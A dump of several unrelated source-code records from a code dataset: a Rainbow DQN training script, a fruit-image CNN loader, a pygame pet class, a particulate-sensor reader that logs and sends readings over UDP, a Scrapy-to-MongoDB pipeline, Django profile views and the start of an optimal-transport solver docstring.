f\"{self.hparams['savepath']}_target_network5.pt\")\n\n\n def solve_env(self, env: OdinsynthEnv, start_obs): \n obs, reward, done, metadata = start_obs, None, False, None\n steps = 0\n while not done:\n steps += 1\n with torch.no_grad():\n logits = self.dqn.forward([obs])[0][0]\n action = np.argmax(logits, axis=-1)\n obs, reward, done, metadata = env.step(action)\n if metadata['solution']:\n done = True # Not necessary\n return (True, steps)\n elif metadata['compromised']:\n done = True # Not 
necessary\n return (False, steps)\n elif obs.query.is_valid_query():\n done = True # Not necessary\n return (False, steps)\n\n\n def test(self):\n solved = []\n steps = []\n self.dqn.eval()\n for ps in self.test_env_factory.problem_specifications:\n result = self.solve_env(OdinsynthEnv(ps), OdinsynthEnvStep(HoleQuery(), ps))\n solved.append(result[0])\n steps.append(result[1])\n # results = [self.solve_env(OdinsynthEnv(ps), OdinsynthEnvStep(HoleQuery(), ps)) for ps in self.test_env_factory.problem_specifications]\n self.dqn.train()\n return len([x for x in solved if x]) / len(solved), np.mean(steps)\n\n def _compute_dqn_loss(self, samples: PrioritizedExperienceReplayBatch, gamma: float) -> torch.Tensor:\n \"\"\"Return the element-wise double-DQN TD loss.\"\"\"\n s_obs, s_actions, s_rewards, s_next_obses, s_dones, weights, indices = samples\n\n dqn_prediction = self.dqn.forward(s_next_obses)\n dqn_argmax = [np.argmax(x[0]) for x in dqn_prediction]\n\n with torch.no_grad():\n tn_forward = self.dqn_target.forward(s_next_obses)\n tn_values = torch.tensor([nobse[0][a] for nobse, a in zip(tn_forward, dqn_argmax)]).to(self.device) # torch.max(target_network.forward(s_next_obses), dim=1)[0]\n target = torch.tensor(s_rewards).to(self.device) + gamma * tn_values * (1 - torch.tensor(s_dones).to(self.device).int()).double()\n\n old_val = self.dqn.forward_batched_helper(s_obs, s_actions).double()\n elementwise_loss = F.mse_loss(old_val, target, reduction='none')\n\n return elementwise_loss\n\n def _target_hard_update(self):\n \"\"\"Hard update: target <- local.\"\"\"\n self.dqn_target.load_state_dict(self.dqn.state_dict())\n \n
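\n# NOTE (added, hedged): _compute_dqn_loss decouples action selection (online-net argmax) from evaluation (target net), i.e. the Double-DQN estimator. With hypothetical per-action values q_online = [1.0, 2.0] and q_target = [0.5, 0.3] for one next state, the chosen action is argmax = 1 and the bootstrap term is gamma * q_target[1] = gamma * 0.3, rather than gamma * max(q_target) = gamma * 0.5 as in vanilla DQN.\n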
\n\nif __name__ == \"__main__\":\n from distutils.util import strtobool # import needed by the boolean CLI flags below\n parser = argparse.ArgumentParser(description='DQN agent')\n # Common arguments\n parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(\".py\"),\n help='the name of this experiment')\n parser.add_argument('--gym-id', type=str, default=\"odinsynth\",\n help='the id of the gym environment')\n parser.add_argument('--learning-rate', type=float, default=3e-5,\n help='the learning rate of the optimizer')\n parser.add_argument('--seed', type=int, default=1,\n help='seed of the experiment')\n parser.add_argument('--total-timesteps', type=int, default=20000,\n help='total timesteps of the experiments')\n parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,\n help='if toggled, `torch.backends.cudnn.deterministic=False`')\n parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,\n help='if toggled, cuda will not be enabled by default')\n parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,\n help='run the script in production mode and use wandb to log outputs')\n parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,\n help='whether to capture videos of the agent performances (check out `videos` folder)')\n parser.add_argument('--wandb-project-name', type=str, default=\"cleanRL\",\n help=\"the wandb's project name\")\n parser.add_argument('--wandb-entity', type=str, default=None,\n help=\"the entity (team) of wandb's project\")\n \n # Algorithm specific arguments\n parser.add_argument('--buffer-size', type=int, default=50000,\n help='the replay memory buffer size')\n parser.add_argument('--gamma', type=float, default=0.9,\n help='the discount factor gamma')\n parser.add_argument('--target-network-frequency', type=int, default=500,\n help=\"the timesteps it takes to update the target network\")\n parser.add_argument('--max-grad-norm', type=float, default=5,\n help='the maximum norm for the gradient clipping')\n parser.add_argument('--batch-size', type=int, default=32,\n help=\"the batch size of sample from the replay memory\")\n parser.add_argument('--start-e', type=float, default=1,\n help=\"the starting epsilon for exploration\")\n parser.add_argument('--end-e', type=float, default=0.0001,\n help=\"the ending epsilon for exploration\")\n parser.add_argument('--exploration-fraction', type=float, default=0.6,\n help=\"the fraction of `total-timesteps` it takes from start-e to go end-e\")\n parser.add_argument('--learning-starts', type=int, default=20000,\n help=\"timestep to start learning\")\n parser.add_argument('--train-frequency', type=int, default=1,\n help=\"the frequency of training\")\n parser.add_argument('--accumulate-gradient', type=int, default=64,\n help=\"for how many steps to accumulate the gradient\")\n parser.add_argument('--test-every', type=int, default=10000,\n help=\"test every time this number of steps has passed\")\n parser.add_argument('--savepath', type=str, default=\"/home/rvacareanu/projects/odinsynth/python/results/rl/from_pretrained_default\",\n help=\"where to save\")\n parser.add_argument('--datapath', type=str, default=\"/data/nlp/corpora/odinsynth/data/rules100k/\",\n help=\"where is the data\")\n parser.add_argument('-ad', '--additional-details', type=str, default=None,\n help=\"More details about this run\")\n parser.add_argument('--beta', type=float, default=0.4,\n help=\"PER specific; How much importance sampling is used\")\n parser.add_argument('--prior-eps', type=float, default=1e-6,\n help=\"PER specific; Guarantees that every transition can be sampled\")\n parser.add_argument('--alpha', type=float, default=0.2,\n help=\"PER specific; How much prioritization is used\")\n\n args = parser.parse_args()\n # if not args.seed:\n # args.seed = int(time.time())\n from utils import init_random\n import time\n init_random(1)\n print(vars(args))\n\n experiment_name = f\"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}\"\n savepath_split = args.savepath.split('/')[-1]\n writer = SummaryWriter(f\"runs/{experiment_name}_{savepath_split}\")\n writer.add_text('hyperparameters', \"|param|value|\\n|-|-|\\n%s\" % (\n '\\n'.join([f\"|{key}|{value}|\" for key, value in vars(args).items()])))\n\n dqn_agent = RainbowDQNAgent(vars(args))\n solved_percentage, steps = dqn_agent.test()\n print(solved_percentage, steps)\n dqn_agent.train()\n\n","sub_path":"lrec2022-odinsynth/python/rl_rainbow_implementation.py","file_name":"rl_rainbow_implementation.py","file_ext":"py","file_size_in_byte":26535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"369260702","text":"import os\r\nimport random\r\nfrom os.path import join as pathjoin\r\nimport skimage\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage import color, data, transform\r\nfrom sklearn.utils import shuffle\r\nimport keras\r\nfrom keras.utils import np_utils\r\nfrom example_.isinstance_ import iscastable\r\nimport tensorflow as tf\r\n\r\nBASE_PATH = 'C://var//images//Fruit-Images-Dataset-master'\r\n\r\n\r\n
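# NOTE (added, hedged): format_path below sorts the numeric-prefixed file names numerically and returns the fifth one; e.g. for ['1_100.jpg', '2_100.jpg', '3_100.jpg', '4_100.jpg', '5_100.jpg'] it returns '5_100.jpg' (index 4). The file names here are illustrative only.\r\n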
def format_path(img):\r\n yes_int = []\r\n for s in range(len(img)):\r\n img[s] = img[s].split('_')\r\n if iscastable.IsCastableNumber(img[s][0])():\r\n img[s][0] = int(img[s][0])\r\n yes_int.append(img[s])\r\n yes_int.sort()\r\n for yi in range(len(yes_int)):\r\n yes_int[yi][0] = str(yes_int[yi][0])\r\n yes_int[yi] = yes_int[yi][0] + '_' + yes_int[yi][1]\r\n no5_img = yes_int[4]\r\n return no5_img\r\n\r\n\r\ndef load_data(dir_path):\r\n image_list = []\r\n label_list = []\r\n\r\n # the 5th image instance in each folder\r\n no5_image_list = []\r\n\r\n # the 5th image's file name in each folder\r\n no5_label_list = []\r\n\r\n n = 0\r\n for lab in os.listdir(pathjoin(dir_path)):\r\n _images = os.listdir(pathjoin(dir_path, lab))\r\n for img in _images:\r\n label_list.append(n)\r\n image_list.append(skimage.data.imread(pathjoin(dir_path, lab, img)))\r\n\r\n n += 1\r\n no5_label_list.append(lab)\r\n no5_image_list.append(skimage.data.imread(pathjoin(dir_path, lab, format_path(_images))))\r\n\r\n return image_list, label_list, no5_image_list, no5_label_list\r\n\r\n\r\ndef print_data_len():\r\n # os.chdir('C://var//images//Fruit-Images-Dataset-master')\r\n base_path = 'C://var//images//Fruit-Images-Dataset-master'\r\n pathTraining = pathjoin(base_path, 'Training')\r\n\r\n images, labels, no5_images, no5_labels = load_data(pathTraining)\r\n print(len(images), len(labels), len(no5_images), len(no5_labels))\r\n\r\n\r\ndef display_data(no5_images, no5_labels):\r\n plt.figure()\r\n for i in range(len(no5_images)):\r\n plt.subplot(12, 10, i + 1)\r\n plt.rcParams.update({'font.size': 6})\r\n plt.title(no5_labels[i])\r\n plt.imshow(no5_images[i])\r\n plt.axis('off')\r\n\r\n plt.subplots_adjust(\r\n top=0.975,\r\n bottom=0.025,\r\n left=0.010,\r\n right=0.990,\r\n hspace=0.3,\r\n wspace=0.000,\r\n )\r\n\r\n plt.show()\r\n\r\n\r\ndef load_small_set(dir_path, times):\r\n image_list = []\r\n label_list = []\r\n n = 0\r\n for lab in os.listdir(dir_path):\r\n if n >= times: break\r\n for image in os.listdir(pathjoin(dir_path, lab)):\r\n label_list.append(int(n))\r\n image_list.append(skimage.data.imread(pathjoin(dir_path, lab, image)))\r\n n += 1\r\n return image_list, label_list,\r\n\r\n\r\ndef run_display_data():\r\n images, labels, no5_images, no5_labels = load_data(pathjoin(BASE_PATH, 'Training'))\r\n display_data(no5_images, no5_labels)\r\n\r\n\r\ndef cut_image(images, w, h):\r\n return [skimage.transform.resize(I, (w, h)) for I in images]\r\n\r\n\r\n# def prepare_data(images, labels, n_classes):\r\n# train_x = np.array(images)\r\n# train_y = np.array(labels)\r\n# idx = np.arange(0, train_y.shape[0])\r\n# idx = shuffle(idx)\r\n# train_x = train_x[idx]\r\n# train_y = train_y[idx]\r\n# train_y = keras.utils.to_categorical(train_y, n_classes)\r\n# return train_x, train_y\r\n\r\ndef prepare_data(images, labels, n_classes):\r\n train_x = np.array(images)\r\n train_y = np.array(labels)\r\n nrand = random.randint(0, 100)\r\n\r\n random.seed(nrand)\r\n random.shuffle(train_x)\r\n random.seed(nrand)\r\n random.shuffle(train_y)\r\n\r\n return train_x, keras.utils.to_categorical(train_y, n_classes) # one-hot encoding\r\n\r\n\r\ndef run_prepare_data():\r\n images_training, labels_training = load_small_set(pathjoin(BASE_PATH, 'Training'), 20)\r\n images_test, labels_test = load_small_set(pathjoin(BASE_PATH, 'Test'), 20)\r\n\r\n\r\ndef run_tf(train_x, test_x: np.ndarray):\r\n # number of data classes\r\n n_classes = 20\r\n\r\n # training batch size\r\n batch_size = 128\r\n\r\n # convolution kernel size\r\n kernel_h = kernel_w = 5\r\n\r\n # dropout probability\r\n dropout = 0.8\r\n\r\n # number of image channels\r\n depth_in = 3\r\n\r\n # number of kernels in the first conv layer\r\n depth_out_l1 = 64\r\n\r\n # number of kernels in the second conv layer\r\n depth_out_l2 = 128\r\n\r\n # image size\r\n image_size = train_x.shape[1]\r\n\r\n # number of training samples\r\n n_train_sample = train_x.shape[0]\r\n\r\n # number of test samples\r\n n_test_sample = test_x.shape[0]\r\n\r\n
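 # NOTE (added, hedged): two 2x2 poolings shrink each spatial dimension by a factor of 4, so the flattened size below divides the image area by 16; a quick sanity check for the 100x100 inputs assumed here: int((100 * 100 / 16) * 128) == 25 * 25 * 128 == 80000.\r\n\r\n 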
# dtype and shape of the image data fed to the network; the shape is 4-D: dim 1 is the batch size, dims 2-3 the image height and width, dim 4 the number of channels\r\n x = tf.placeholder(tf.float32, [None, 100, 100, 3])\r\n\r\n # dtype and shape of the label data fed to the network\r\n y = tf.placeholder(tf.float32, [None, n_classes])\r\n\r\n # placeholder for dropout, used against overfitting\r\n keep_prob = tf.placeholder(tf.float32)\r\n\r\n # size used when flattening: image area after two conv/pool stages * number of kernels in the second conv layer\r\n fla = int((image_size * image_size / 16) * depth_out_l2)\r\n\r\n # define the weight variables of the conv and fully connected layers\r\n weights = {\r\n 'con1_w': tf.Variable(tf.random_normal([kernel_h, kernel_w, depth_in, depth_out_l1])),\r\n 'con2_w': tf.Variable(tf.random_normal([kernel_h, kernel_w, depth_out_l1, depth_out_l2])),\r\n 'fc_w1': tf.Variable(tf.random_normal([int((image_size * image_size / 16) * depth_out_l2), 1024])),\r\n 'fc_w2': tf.Variable(tf.random_normal([1024, 512])),\r\n 'out': tf.Variable(tf.random_normal([512, n_classes])),\r\n }\r\n\r\n # define the bias variables of the conv and fully connected layers\r\n bias = {\r\n 'conv1_b': tf.Variable(tf.random_normal([depth_out_l1])),\r\n 'conv2_b': tf.Variable(tf.random_normal([depth_out_l2])),\r\n 'fc_b1': tf.Variable(tf.random_normal([1024])),\r\n 'fc_b2': tf.Variable(tf.random_normal([512])),\r\n 'out': tf.Variable(tf.random_normal([n_classes])),\r\n }\r\n\r\n\r\nif __name__ == '__main__':\r\n # run_display_data()\r\n run_prepare_data()\r\n","sub_path":"basic_/ai_/recognize_fruits/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"375680441","text":"import Model.const as model_const\nfrom pygame.math import Vector2 as Vec\nimport random\n\nclass Pet(object):\n __slots__ = ('owner_index', 'carry_max', 'carry_now', 'position', 'radius', 'color', 'direction', 'status', 'speed', 'cd_time', 'cd')\n def __init__(self, owner_index, position):\n self.owner_index = owner_index\n self.carry_max = model_const.pet_carry_max\n self.carry_now = 0\n self.position = Vec(position)\n self.radius = model_const.pet_radius\n self.color = [ random.randint(0, 255) for _ in range(3) ]\n self.direction = Vec(0, 0)\n \"\"\"\n Pet is a circle\n \"\"\"\n self.status = 0\n \"\"\"\n 0 for staying base\n 1 for chasing the player\n 2 for going base\n \"\"\"\n self.speed = model_const.pet_normal_speed\n self.cd_time = model_const.pet_cd_time\n self.cd = self.cd_time\n \n def check_collide_with_player(self, player):\n if self.status == 1 and Vec(self.position - player.position).length() <= player.radius + self.radius:\n delta = min(self.carry_max - self.carry_now, player.value)\n self.carry_now += delta\n player.value -= delta\n self.status = 2\n \n def change_status(self, new_status):\n self.status = new_status\n \n def check_collide_with_base(self, base):\n if self.status == 2 and Vec(self.position - base.center).length() <= self.radius:\n self.status = 0\n self.cd = self.cd_time\n base.value_sum += self.carry_now\n self.carry_now = 0\n \n
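 # NOTE (added, hedged): the transfer in check_collide_with_player moves at most the remaining capacity; an illustrative case: carry_max=10, carry_now=7, player.value=5 -> delta = min(3, 5) = 3, leaving the player with 2.\n \n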
 def update(self, player_list, base_list):\n self.check_collide_with_player(player_list[self.owner_index])\n self.check_collide_with_base(base_list[self.owner_index])\n if self.status == 0:\n self.direction = Vec(0, 0)\n self.cd -= 1\n if self.cd == 0:\n self.change_status(1)\n else:\n target = (player_list[self.owner_index].position if self.status == 1 \\\n else base_list[self.owner_index].center)\n self.direction = Vec.normalize(target - self.position)\n self.position += self.direction * self.speed\n\n","sub_path":"Model/GameObject/pet.py","file_name":"pet.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"507403958","text":"import serial\nimport time\nimport datetime\nimport json\nimport socket\nimport csv\n\n# setup onboard serial port NB RPi 3 address\nport = serial.Serial('/dev/ttyS0', baudrate=9600, timeout=2.0)\nremote_PORT = 33333;\nremote_HOST = '138.68.134.165'\ncsvFile=\"/home/pi/AirQuality/client/pm.log\"\nw = csv.writer(open(csvFile,'a'),dialect='excel')\nlocal_PORT = 33333\nlocal_HOST = '10.15.40.221'\n# function to read a line of serial data\ndef read_pm_line(_port):\n rv = b''\n while True:\n ch1 = _port.read()\n if ch1 == b'\\x42':\n ch2 = _port.read()\n if ch2 == b'\\x4d':\n rv += ch1 + ch2\n rv += _port.read(28)\n return rv\n\n# initialise variables\nloop = 0\n# rcv_list = []\n
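\n# NOTE (added, hedged): the 0x42 0x4d header marks a PMS5003-style frame; the sensor's full frame is 32 bytes (2 header + 28 data + 2 checksum), while read_pm_line returns header + 28 bytes, so the trailing checksum pair is never captured or validated here. A stricter reader could, illustratively, do:\n# rv += _port.read(30)\n# assert sum(map(ord, rv[:-2])) & 0xFFFF == (ord(rv[-2]) << 8) | ord(rv[-1])\n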
\nwhile True: # replace with timed polling\n try:\n print(\"trying to read\")\n rcv = read_pm_line(port)\n print(\"is reading\")\n# probably a more 'python' way of doing this\n\n\n res = {\n '_type': 'pm',\n '$timestamp': str(datetime.datetime.now()),\n '$PM10': ord(rcv[4]) * 256 + ord(rcv[5]),\n '$PM25_CF1': ord(rcv[6]) * 256 + ord(rcv[7]),\n '$PM100_CF1': ord(rcv[8]) * 256 + ord(rcv[9]),\n '$PM10_STD': ord(rcv[10]) * 256 + ord(rcv[11]),\n '$PM25_STD': 0.01*(ord(rcv[12]) * 256 + ord(rcv[13])),\n '$PM100_STD': ord(rcv[14]) * 256 + ord(rcv[15]),\n '$gr03um': ord(rcv[16]) * 256 + ord(rcv[17]),\n '$gt05um': ord(rcv[18]) * 256 + ord(rcv[19]),\n '$gr10um': ord(rcv[20]) * 256 + ord(rcv[21]),\n '$gr25um': ord(rcv[22]) * 256 + ord(rcv[23]),\n '$gr50um': ord(rcv[24]) * 256 + ord(rcv[25]),\n '$gr100um': ord(rcv[26]) * 256 + ord(rcv[27])\n }\n\n # convert message to JSON\n # actual numbers in names only (name)/10\n\n # message = ('===============\\n'\n # '$timestamp :{}'\n # '$PM10 : {}'\n # '$PM25_CF1: {}'\n # '$PM10_CF1: {}'\n # '$PM10_STD: {}'\n # '$PM25_STD: {}'\n # '$PM100_STD: {}'\n # '$gr03um : {}'\n # '$gr05um : {}'\n # '$gr10um : {}'\n # '$gr25um : {}'\n # '$gr50um : {}'\n # '$gr10um : {}'.format(res['timestamp'], res['apm10'], res['apm25'], res['apm100'],\n # res['pm10'], res['pm25'], res['pm100'],\n # res['gt03um'], res['gt05um'], res['gt10um'],\n # res['gt25um'], res['gt50um'], res['gt100um']))\n message = json.dumps(res)\n print(message)\n w.writerow(message)\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n sock.sendto(message, (local_HOST, local_PORT))\n sock.sendto(message, (remote_HOST, remote_PORT))\n\n time.sleep(0.1) # wait 100 milliseconds\n\n # rcv_list.append(res.copy())\n loop += 1\n except KeyboardInterrupt:\n break\n","sub_path":"ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"400657604","text":"INF = 10 ** 9 + 7\nH, N = map(int, input().split())\nab = [list(map(int, input().split())) for _ in range(N)]\ndp = [INF] * (H + 1)\ndp[0] = 0\n\nfor i in range(N):\n for j in range(H):\n if dp[j] == INF: continue\n if j + ab[i][0] <= H:\n dp[j + ab[i][0]] = min(dp[j + ab[i][0]], dp[j] + ab[i][1])\n else:\n dp[H] = min(dp[H], dp[j] + ab[i][1])\n\nprint(dp[H])","sub_path":"Python_codes/p02787/s864520847.py","file_name":"s864520847.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"87466788","text":"num1, num2, num3, num4 = input().split(\" \");\nnum1 = int(num1);\nnum2 = int(num2);\nnum3 = int(num3);\nnum4 = int(num4);\nif num1 == 1:\n c = 1;\nelif num2 == 1:\n c = 2;\nelif num3 == 1:\n c = 3;\nelif num4 == 1:\n c = 4;\nprint(c);\n","sub_path":"Uri_Online_Judge/2791.py","file_name":"2791.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} {"seq_id":"321935493","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport re\nimport pymongo\nfrom scrapy.conf import settings\nfrom scrapy.exceptions import DropItem\n\nclass TextPipeline(object):\n def __init__(self):\n self.pa = '\\r\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t(.*)'\n\n def process_item(self, item, spider):\n if item['zhiwu']:\n searchObj = re.match('\\r\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t(.*)',item['zhiwu'])\n item['zhiwu'] = searchObj.group(1)\n return item\n else:\n raise DropItem('regex processing failed')\n\n\nclass MongoPipeline(object):\n def __init__(self):\n self.host = settings['MONGO_HOST']\n self.port = settings['MONGO_PORT']\n self.db = settings['MONGO_DB']\n self.clo = settings['MONGO_CLO']\n client = pymongo.MongoClient(host='localhost', port=27017)\n db = client['liepin']\n self.collection = db['jieguo']\n\n def process_item(self, item, spider):\n shuju = dict(item)\n self.collection.insert(shuju)\n return 
item","sub_path":"zhaopin/zhaopin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"585641857","text":"#!/usr/bin/env python\n\n\ndef check_answer(game, name):\n print('Answer \"yes\" if the number is even, otherwise answer \"no\".')\n questions = 3\n for _ in range(questions):\n answer, number = game()\n print(f\"Question: {number}\")\n user_input = input(\"Your answer: \")\n if user_input == answer:\n print(\"Correct!\")\n continue\n if user_input != answer:\n print(f\"'{user_input}' is wrong answer ;(. Correct answer was \"\n f\"'{answer}'. \\nLet's try again, {name}! \")\n return\n print(f\"Congratulations, {name}!\")\n","sub_path":"brain_games/games/get_answer.py","file_name":"get_answer.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274314964","text":"from django.shortcuts import render, redirect\n\nfrom app.common.profile import get_profile\nfrom app.forms.profile import ProfileForm\nfrom app.models import Note\n\n\ndef profile_index(request):\n profile = get_profile()\n notes_count = len(profile.note_set.all())\n\n context = {\n 'profile': profile,\n 'notes_count': notes_count\n }\n\n return render(request, 'profile.html', context)\n\n\ndef create_profile(request):\n if request.method == 'GET':\n context = {\n 'form': ProfileForm()\n }\n\n return render(request, 'home-no-profile.html', context)\n\n else:\n form = ProfileForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n\n context = {\n 'form': form,\n }\n\n return render(request, 'home-no-profile.html', context)\n","sub_path":"app/views/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"59365883","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGeneral OT solvers with unified API\n\"\"\"\n\n# Author: Remi Flamary \n#\n# License: MIT License\n\nfrom .utils import OTResult\nfrom .lp import emd2\nfrom .backend import get_backend\nfrom .unbalanced import mm_unbalanced, sinkhorn_knopp_unbalanced, lbfgsb_unbalanced\nfrom .bregman import sinkhorn_log\nfrom .partial import partial_wasserstein_lagrange\nfrom .smooth import smooth_ot_dual\n\n\ndef solve(M, a=None, b=None, reg=None, reg_type=\"KL\", unbalanced=None,\n unbalanced_type='KL', n_threads=1, max_iter=None, plan_init=None,\n potentials_init=None, tol=None, verbose=False):\n r\"\"\"Solve the discrete optimal transport problem and return :any:`OTResult` object\n\n The function solves the following general optimal transport problem\n\n .. math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_r R(\\mathbf{T}) +\n \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) +\n \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n The regularization is selected with `reg` (:math:`\\lambda_r`) and `reg_type`. By\n default ``reg=None`` and there is no regularization. The unbalanced marginal\n penalization can be selected with `unbalanced` (:math:`\\lambda_u`) and\n `unbalanced_type`. 
By default ``unbalanced=None`` and the function\n solves the exact optimal transport problem (respecting the marginals).\n\n Parameters\n ----------\n M : array_like, shape (dim_a, dim_b)\n Loss matrix\n a : array-like, shape (dim_a,), optional\n Samples weights in the source domain (default is uniform)\n b : array-like, shape (dim_b,), optional\n Samples weights in the target domain (default is uniform)\n reg : float, optional\n Regularization weight :math:`\\lambda_r`, by default None (no reg., exact\n OT)\n reg_type : str, optional\n Type of regularization :math:`R` either \"KL\", \"L2\", \"entropy\", by default \"KL\"\n unbalanced : float, optional\n Unbalanced penalization weight :math:`\\lambda_u`, by default None\n (balanced OT)\n unbalanced_type : str, optional\n Type of unbalanced penalization function :math:`U` either \"KL\", \"L2\", \"TV\", by default \"KL\"\n n_threads : int, optional\n Number of OMP threads for exact OT solver, by default 1\n max_iter : int, optional\n Maximum number of iterations, by default None (default values in each solver)\n plan_init : array_like, shape (dim_a, dim_b), optional\n Initialization of the OT plan for iterative methods, by default None\n potentials_init : (array_like(dim_a,),array_like(dim_b,)), optional\n Initialization of the OT dual potentials for iterative methods, by default None\n tol : float, optional\n Tolerance for solution precision, by default None (default values in each solver)\n verbose : bool, optional\n Print information in the solver, by default False\n\n Returns\n -------\n res : OTResult()\n Result of the optimization problem. The information can be obtained as follows:\n\n - res.plan : OT plan :math:`\\mathbf{T}`\n - res.potentials : OT dual potentials\n - res.value : Optimal value of the optimization problem\n - res.value_linear : Linear OT loss with the optimal OT plan\n\n See :any:`OTResult` for more information.\n\n Notes\n -----\n\n The following methods are available for solving the OT problems:\n\n - **Classical exact OT problem** (default parameters):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n res = ot.solve(M, a, b)\n\n - **Entropic regularized OT** (when ``reg!=None``):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F + \\lambda R(\\mathbf{T})\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"`` regularization (``reg_type=\"KL\"``)\n res = ot.solve(M, a, b, reg=1.0)\n # or for original Sinkhorn paper formulation [2]\n res = ot.solve(M, a, b, reg=1.0, reg_type='entropy')\n\n - **Quadratic regularized OT** (when ``reg!=None`` and ``reg_type=\"L2\"``):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F + \\lambda R(\\mathbf{T})\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n res = ot.solve(M,a,b,reg=1.0,reg_type='L2')\n\n - **Unbalanced OT** (when ``unbalanced!=None``):\n\n .. 
math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) + \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"``\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0)\n # quadratic unbalanced OT\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='L2')\n # TV = partial OT\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='TV')\n\n\n - **Regularized unbalanced regularized OT** (when ``unbalanced!=None`` and ``reg!=None``):\n\n .. math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_r R(\\mathbf{T}) + \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) + \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"`` for both\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0)\n # quadratic unbalanced OT with KL regularization\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='L2')\n # both quadratic\n res = ot.solve(M,a,b,reg=1.0, reg_type='L2',unbalanced=1.0,unbalanced_type='L2')\n\n\n .. _references-solve:\n References\n ----------\n\n .. [2] M. Cuturi, Sinkhorn Distances : Lightspeed Computation\n of Optimal Transport, Advances in Neural Information Processing\n Systems (NIPS) 26, 2013\n\n .. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).\n Scaling algorithms for unbalanced transport problems.\n arXiv preprint arXiv:1607.05816.\n\n .. [17] Blondel, M., Seguy, V., & Rolet, A. (2018). Smooth and Sparse\n Optimal Transport. Proceedings of the Twenty-First International\n Conference on Artificial Intelligence and Statistics (AISTATS).\n\n .. [34] Feydy, J., Séjourné, T., Vialard, F. X., Amari, S. I., Trouvé,\n A., & Peyré, G. (2019, April). Interpolating between optimal transport\n and MMD using Sinkhorn divergences. In The 22nd International Conference\n on Artificial Intelligence and Statistics (pp. 2681-2690). 
